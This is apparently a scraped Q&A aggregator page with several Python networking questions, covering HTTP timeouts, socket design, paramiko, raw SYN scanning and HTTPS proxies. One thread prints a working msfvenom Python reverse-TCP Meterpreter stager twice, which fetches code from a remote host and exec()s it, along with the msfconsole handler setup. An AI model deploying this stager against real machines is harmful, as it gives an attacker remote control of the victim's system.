Python urllib2.urlopen bug: timeout error brings down my Internet connection?

Python urllib2.urlopen bug: timeout error brings down my Internet connection? - python

I don't know if I'm doing something wrong, but I'm 100% sure it's the python script brings down my Internet connection.
I wrote a python script to scrape thousands of files header info, mainly for Content-Length to get the exact size of each file, using HEAD request.
Sample code:
class HeadRequest(urllib2.Request):
def get_method(self):
return "HEAD"
response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is after several hours running, the script starts to throw out urlopen error timed out, and my Internet connection is down from then on. And my Internet connection will always be back on immediately after I close that script. At the beginning I thought it might be the connection not stable, but after several times running, it turned out to be the scripts fault.
I don't know why, this should be considered as a bug, right? Or my ISP banned me for doing such things? (I already set the program to wait 10s each request)
BTW, I'm using VPN network, does it have something to do with this?

I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.

"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update Your Question with this information, and how you got it.
If only the computer running the script is stopped, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually its sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly what operating system you're using. You need to use this diagnostic software to see how many open sockets are cluttering up your system.

Related

Efficient way to send results every 1-30 seconds from one machine to another

Key points:
I need to send roughly ~100 float numbers every 1-30 seconds from one machine to another.
The first machine is catching those values through sensors connected to it.
The second machine is listening for them, passing them to an http server (nginx), a telegram bot and another program sending emails with alerts.
How would you do this and why?
Please be accurate. It's the first time I work with sockets and with python, but I'm confident I can do this. Just give me crucial details, lighten me up!
Some small portion (a few rows) of the core would be appreciated if you think it's a delicate part, but the main goal of my question is to see the big picture.

Main thing here is to decide on a connection design and to choose protocol. I.e. will you have a persistent connection to your server or connect each time when new data is ready to it.
Then will you use HTTP POST or Web Sockets or ordinary sockets. Will you rely exclusively on nginx or your data catcher will be another serving service.
This would be a most secure way, if other people will be connecting to nginx to view sites etc.
Write or use another server to run on another port. For example, another nginx process just for that. Then use SSL (i.e. HTTPS) with basic authentication to prevent anyone else from abusing the connection.
Then on client side, make a packet every x seconds of all data (pickle.dumps() or json or something), then connect to your port with your credentials and pass the packet.
Python script may wait for it there.
Or you write a socket server from scratch in Python (not extra hard) to wait for your packets.
The caveat here is that you have to implement your protocol and security. But you gain some other benefits. Much more easier to maintain persistent connection if you desire or need to. I don't think it is necessary though and it can become bulky to code break recovery.
No, just wait on some port for a connection. Client must clearly identify itself (else you instantly drop the connection), it must prove that it talks your protocol and then send the data.
Use SSL sockets to do it so that you don't have to implement encryption yourself to preserve authentication data. You may even rely only upon in advance built keys for security and then pass only data.
Do not worry about the speed. Sockets are handled by OS and if you are on Unix-like system you may connect as many times you want in as little time interval you need. Nothing short of DoS attack won't inpact it much.
If on Windows, better use some finished server because Windows sometimes do not release a socket on time so you will be forced to wait or do some hackery to avoid this unfortunate behaviour (non blocking sockets and reuse addr and then some flo control will be needed).
As far as your data is small you don't have to worry much about the server protocol. I would use HTTPS myself, but I would write myown light-weight server in Python or modify and run one of examples from internet. That's me though.

The simplest thing that could possibly work would be to take your N floats, convert them to a binary message using struct.pack(), and then send them via a UDP socket to the target machine (if it's on a single LAN you could even use UDP multicast, then multiple receivers could get the data if needed). You can safely send a maximum of 60 to 170 double-precision floats in a single UDP datagram (depending on your network).
This requires no application protocol, is easily debugged at the network level using Wireshark, is efficient, and makes it trivial to implement other publishers or subscribers in any language.

Paramiko get stdout from connection object (not exec_command)

I'm writing a script that uses paramiko to ssh onto several remote hosts and run a few checks. Some hosts are setup as fail-overs for others and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts the host will inform me that you need to connect to another 'active' IP and then close the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection, exec_command will obviously give me stdout and stderr, but the host is outputting this immediately upon connection, and it doesn't accept any other incoming requests/messages. It just closes after n seconds.
I don't want to have to wait until the timeout to move onto the next host and I'd also like to verify that that's the reason for not being able to connect and run the checks, otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, is greatly appreciated.

I figured out a way to get the data, it was pretty straight forward to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages, one saying it can't chdir to a particular directory, then a few milliseconds later it spits out another message stating that you need to connect to the other IP. If I send a command immediately after connecting (doesn't matter what command), exec_command will interpret this second message as the response. So for now I have a solution to my problem as I can check this string for a known message and change the flow of execution.
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.

Meterpreter not connecting back - Python

I have used msfvenom to create the following python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?

This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post after error searching, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN, as opposed to LAN, however it doesn't run the first time around. What ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})

speed limit of syn scanning ports of multiple targets?

I've coded a small raw packet syn port scanner to scan a list of ips and find out if they're online. (btw. for Debian in python2.7)
The basic intention was to simply check if some websites are reachable and speed up that process by preceding a raw syn request (port 80) but I stumbled upon something.
Just for fun I started trying to find out how fast I could get with this (fastest as far as i know) check technique and it turns out that despite I'm only sending raw syn packets on one port and listening for responses on that same port (with tcpdump) the connection reliability quite drops starting at about 1500-2000 packets/sec and shortly thereafter almost the entire networking starts blocking on the box.
I thought about it and if I compare this value with e.g. torrent seeding/leeching packets/sec the scan speed is quiet slow.
I have a few ideas why this happens but I'm not a professional and I have no clue how to check if I'm right with my assumptions.
Firstly it could be that the Linux networking has some fancy internal port forwarding stuff running to keep the sending port opened (maybe some sort of feature of iptables?) because the script seems to be able to receive syn-ack even with closed sourceport.
If so, is it possible to prevent or bypass that in some fashion?
Another guess is that the python library is simply too dumb to do real proper raw packet management but that's unlikely because its using internal Linux functions to do that as far as I know.
Does anyone have a clue why that network blocking is happening?
Where's the difference to torrent connections or anything else like that?
Do I have to send the packets in another way or anything?

Months ago I found out that this problem is well known as c10k problem.
It has to do amongst other things with how the kernel allocates and processes tcp connections internally.
The only efficient way to address the issue is to bypass the kernel tcp stack and implement various other low-level things by your own.
All good approaches I know are working with low-level async implementations
There are some good ways to deal with the problem depending on the scale.
For further information i would recommend to search for the c10k problem.

Handling https requests using a SOCK_STREAM proxy

I'm working on a project that allows a user to redirect his browsing through a proxy. The system works like this - a user runs this proxy on a remote PC and then also runs the proxy on his laptop. The user then changes his browser settings on the laptop to use localhost:8080 to make use of that local proxy, which in turn forwards all browser traffic to the proxy running on the remote PC.
This is where I ran into HTTPS. I was able to get normal HTTP requests working fine and dandy, but as soon as I clicked on google.com, Firefox skipped my proxy and connected to https://google.com directly.
My idea was to watch for browser requests the say CONNECT host:443 and then use the python ssl module to wrap that socket. This would give me a secure connection between the outer proxy and the target server. However, when I run wireshark to see how a browser request looks like before ssl kicks in, it's already there, meaning it looks like the browser connects to port 443 directly, which explains why it omitted my local proxy.
I would like to be able to handle to HTTPS as that would make for a complete browsing experience.
I'd really appreciate any tips that could push in the right direction.

Well, after doing a fair amount of reading on proxies, I found out that my understanding of the problem was insufficient.
For anyone else that might end up in the same spot as me, know that there's a pretty big difference between HTTP, HTTPS, and SOCKS proxies.
HTTP proxies usually take a quick look into the HTTP headers to determine where to forward the whole packet. These are quite easy to code on your own with some basic knowledge of sockets.
HTTPS proxies, on the other hand, have to work differently. They should either be able to do the whole SSL magic for the client or they could try to pass the traffic without changes, however if the latter solution is chosen, the users IP will be known. This is a wee bit more demanding when it comes to coding.
SOCKS proxies are a whole different, albeit really cool, beast. They work on the 5th layer of the OSI model and honestly, I have no clue as to where I would even begin creating one. They achieve both security and anonymity. However, I do know that a person may be able to use SSH to start a SOCKS proxy on their machine, just read this http://www.revsys.com/writings/quicktips/ssh-tunnel.html . That link also gave an idea that it should be possible to use SSH from a Python script to make it much more convenient.
Hope this helps anyone with the same question as I had. Good luck!

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.